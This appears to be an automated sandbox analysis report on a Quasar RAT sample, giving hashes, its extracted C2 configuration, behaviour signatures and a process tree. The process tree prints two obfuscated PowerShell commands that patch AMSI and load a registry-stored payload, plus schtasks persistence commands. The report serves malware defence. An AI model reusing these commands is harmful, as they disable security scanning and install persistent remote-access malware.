Analysis

  • max time kernel
    1800s
  • max time network
    1781s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-05-2024 17:28

General

  • Target

    Uni.exe

  • Size

    409KB

  • MD5

    7417c8c73e614f293152575f46134216

  • SHA1

    cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805

  • SHA256

    00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3

  • SHA512

    897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0

  • SSDEEP

    6144:nMr2pJAJcC0B632U3GRbMfgvKFFhTEDPX1NbKoEn5MSU+h2f8/14m:LpyJcC+82U3GRGGp1M5Ys2f8/6m

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SLAVE

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-dOMA5C0pQTTpKjVsCp

Attributes
  • encryption_key

    UBXs44u6E81wxBGZxQHk

  • install_name

    $sxr-powershell.exe

  • log_directory

    $SXR-KEYLOGS

  • reconnect_delay

    3000

  • startup_key

    $sxr-powershell

  • subdirectory

    $sxr-seroxen2

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:600
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:336
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{0a80d9a3-5396-440c-a465-1ad0e938c235}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2332
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{805349d0-2127-44b7-aafd-fa8bf0feb782}
        2⤵
          PID:4360
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 4360 -s 288
            3⤵
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:1368
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:680
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:956
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:760
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:1056
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1124
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1132
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1180
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:2944
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zMLfToattpdp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$JpuVjlHZSbEarD,[Parameter(Position=1)][Type]$zANAsQYZpm)$tBGbcLAHQGC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+'l'+'e'+'c'+[Char](116)+''+[Char](101)+''+[Char](100)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+'em'+'o'+'r'+'y'+''+'M'+''+'o'+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+'l'+'a'+''+[Char](115)+''+[Char](115)+''+','+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+','+'A'+''+[Char](110)+''+'s'+'i'+[Char](67)+'l'+'a'+'ss'+[Char](44)+'A'+[Char](117)+'t'+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$tBGbcLAHQGC.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+'e'+','+''+'H'+'i'+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+'S'+''+'i'+'g,'+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$JpuVjlHZSbEarD).SetImplementationFlags('R'+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+','+[Char](77)+''+'a'+''+'n'+''+[Char](97)+'g'+'e'+''+[Char](100)+'');$tBGbcLAHQGC.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g,'+'N'+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+''+'o'+''+'t'+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$zANAsQYZpm,$JpuVjlHZSbEarD).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+'ag'+'e'+''+'d'+'');Write-Output $tBGbcLAHQGC.CreateType();}$fwtGBqWABCmDx=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+[Char](101)+''+[Char](109)+''+[Char](46)+'dl'+[Char](108)+'')}).GetType(''+[Char](77)+'icro'+[Char](115)+''+'o'+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+''+'i'+''+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+''+[Char](110)+'s'+'a'+''+[Char](102)+''+'e'+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+'M'+'e'+''+'t'+'h'+[Char](111)+'d'+[Char](115)+'');$KxityZUdSYjBLQ=$fwtGBqWABCmDx.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+'d'+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$kukrsMEWCymvbXSMPxY=zMLfToattpdp @([String])([IntPtr]);$rtYFlhvnKVQPKjfmusGfgx=zMLfToattpdp @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jEeBRGZfkaK=$fwtGBqWABCmDx.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e'+[Char](72)+'a'+'n'+''+'d'+'l'+'e'+'').Invoke($Null,@([Object]('ke'+[Char](114)+''+[Char](110)+''+'e'+''+'l'+''+'3'+'2'+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$FYWKBtOcOKDNHu=$KxityZUdSYjBLQ.Invoke($Null,@([Object]$jEeBRGZfkaK,[Object](''+'L'+''+'o'+'ad'+[Char](76)+''+'i'+''+[Char](98)+'r'+'a'+'r'+[Char](121)+''+'A'+'')));$atoZNIYVNfZfESwqP=$KxityZUdSYjBLQ.Invoke($Null,@([Object]$jEeBRGZfkaK,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+'a'+'l'+''+'P'+''+'r'+'ot'+[Char](101)+''+[Char](99)+'t')));$YpQsgtg=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FYWKBtOcOKDNHu,$kukrsMEWCymvbXSMPxY).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$ewTIsGMbZpMABxIVT=$KxityZUdSYjBLQ.Invoke($Null,@([Object]$YpQsgtg,[Object](''+[Char](65)+''+[Char](109)+'s'+'i'+'S'+'c'+''+[Char](97)+''+'n'+''+[Char](66)+''+'u'+''+[Char](102)+''+'f'+''+[Char](101)+''+'r'+'')));$NimYcTXqmW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($atoZNIYVNfZfESwqP,$rtYFlhvnKVQPKjfmusGfgx).Invoke($ewTIsGMbZpMABxIVT,[uint32]8,4,[ref]$NimYcTXqmW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ewTIsGMbZpMABxIVT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($atoZNIYVNfZfESwqP,$rtYFlhvnKVQPKjfmusGfgx).Invoke($ewTIsGMbZpMABxIVT,[uint32]8,0x20,[ref]$NimYcTXqmW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+'F'+''+'T'+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3316
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CDbOzJHRquMY{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hfhoOKyEIcaqNK,[Parameter(Position=1)][Type]$lhUOgKafDu)$gJaMRdZtlgL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+'e'+''+'d'+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+'e'+'m'+[Char](111)+''+'r'+''+[Char](121)+''+'M'+'od'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+'y'+'D'+''+'e'+''+[Char](108)+''+[Char](101)+'g'+'a'+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+'p'+[Char](101)+'','C'+'l'+''+'a'+''+'s'+''+'s'+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+'n'+'s'+'i'+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+',A'+[Char](117)+''+'t'+''+[Char](111)+'C'+[Char](108)+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$gJaMRdZtlgL.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+'p'+''+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+'N'+'a'+'m'+'e'+''+[Char](44)+''+'H'+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+'y'+'S'+[Char](105)+''+[Char](103)+''+','+''+'P'+''+'u'+''+[Char](98)+'l'+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$hfhoOKyEIcaqNK).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');$gJaMRdZtlgL.DefineMethod(''+[Char](73)+''+'n'+''+'v'+''+[Char](111)+''+'k'+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+'d'+[Char](101)+''+'B'+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+'w'+'Sl'+'o'+''+[Char](116)+','+[Char](86)+''+[Char](105)+''+'r'+'t'+[Char](117)+''+[Char](97)+''+'l'+'',$lhUOgKafDu,$hfhoOKyEIcaqNK).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+','+[Char](77)+''+[Char](97)+'nag'+'e'+'d');Write-Output $gJaMRdZtlgL.CreateType();}$ErMXCnJHzUFBC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+'o'+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+'.'+'W'+[Char](105)+''+[Char](110)+''+'3'+''+'2'+''+[Char](46)+''+[Char](85)+''+'n'+'s'+'a'+''+'f'+''+[Char](101)+''+[Char](78)+'at'+[Char](105)+''+'v'+'e'+[Char](77)+'et'+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$WqlvIvpMXQxywi=$ErMXCnJHzUFBC.GetMethod(''+[Char](71)+''+'e'+'t'+[Char](80)+'r'+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+'d'+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('Pub'+[Char](108)+''+[Char](105)+''+[Char](99)+','+'S'+'ta'+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BmZripDJPBBAwwVGkoy=CDbOzJHRquMY @([String])([IntPtr]);$GUTOFCUTSUQHYaYFXLHKLQ=CDbOzJHRquMY @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LPOGhUGjdNC=$ErMXCnJHzUFBC.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+'o'+''+[Char](100)+''+'u'+''+'l'+''+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+'32.d'+[Char](108)+''+'l'+'')));$UfXRLybaqNnHJo=$WqlvIvpMXQxywi.Invoke($Null,@([Object]$LPOGhUGjdNC,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+''+[Char](76)+'i'+[Char](98)+''+[Char](114)+'a'+[Char](114)+''+'y'+'A')));$fMZlhiyCxLGPqHuGf=$WqlvIvpMXQxywi.Invoke($Null,@([Object]$LPOGhUGjdNC,[Object](''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+'u'+'a'+[Char](108)+'P'+[Char](114)+''+[Char](111)+'t'+[Char](101)+'ct')));$xnszVXw=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UfXRLybaqNnHJo,$BmZripDJPBBAwwVGkoy).Invoke(''+'a'+''+'m'+'s'+[Char](105)+'.dl'+[Char](108)+'');$hBGoluISTGWONgmqK=$WqlvIvpMXQxywi.Invoke($Null,@([Object]$xnszVXw,[Object]('A'+'m'+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+'a'+''+[Char](110)+'B'+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$tyctTZVIsx=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fMZlhiyCxLGPqHuGf,$GUTOFCUTSUQHYaYFXLHKLQ).Invoke($hBGoluISTGWONgmqK,[uint32]8,4,[ref]$tyctTZVIsx);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hBGoluISTGWONgmqK,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fMZlhiyCxLGPqHuGf,$GUTOFCUTSUQHYaYFXLHKLQ).Invoke($hBGoluISTGWONgmqK,[uint32]8,0x20,[ref]$tyctTZVIsx);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+''+'R'+'E').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+'s'+''+'t'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1984
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            3⤵
                              PID:1996
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                          1⤵
                          • Drops file in System32 directory
                          PID:1220
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1264
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1316
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                              1⤵
                                PID:1360
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1412
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                    • Modifies registry class
                                    PID:2636
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                  1⤵
                                    PID:1464
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1564
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1580
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                        1⤵
                                          PID:1636
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1728
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                            1⤵
                                              PID:1772
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                              1⤵
                                                PID:1780
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1864
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:1972
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                    1⤵
                                                      PID:2008
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:2024
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:1708
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                          1⤵
                                                            PID:1952
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:2128
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                                PID:2216
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                1⤵
                                                                  PID:2304
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2452
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2460
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                      1⤵
                                                                        PID:2660
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                        1⤵
                                                                          PID:2760
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                          1⤵
                                                                            PID:2812
                                                                          • C:\Windows\sysmon.exe
                                                                            C:\Windows\sysmon.exe
                                                                            1⤵
                                                                              PID:2832
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                              1⤵
                                                                                PID:2844
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                1⤵
                                                                                  PID:2852
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                  1⤵
                                                                                    PID:3000
                                                                                  • C:\Windows\system32\wbem\unsecapp.exe
                                                                                    C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                    1⤵
                                                                                      PID:3120
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                      1⤵
                                                                                        PID:3464
                                                                                      • C:\Windows\Explorer.EXE
                                                                                        C:\Windows\Explorer.EXE
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of UnmapMainImage
                                                                                        PID:3556
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Uni.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\Uni.exe"
                                                                                          2⤵
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:1192
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f
                                                                                            3⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:756
                                                                                          • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:3572
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f
                                                                                              4⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:2744
                                                                                            • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:3240
                                                                                          • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4688
                                                                                          • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                            "SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST
                                                                                            3⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:4712
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                        1⤵
                                                                                          PID:3660
                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                          1⤵
                                                                                            PID:3876
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                            • Modifies registry class
                                                                                            PID:4032
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                              PID:4176
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                              1⤵
                                                                                                PID:1652
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                1⤵
                                                                                                  PID:3132
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                  1⤵
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:4520
                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                  1⤵
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:1764
                                                                                                • C:\Windows\system32\SppExtComObj.exe
                                                                                                  C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:4664
                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                    1⤵
                                                                                                      PID:396
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                      1⤵
                                                                                                        PID:3200
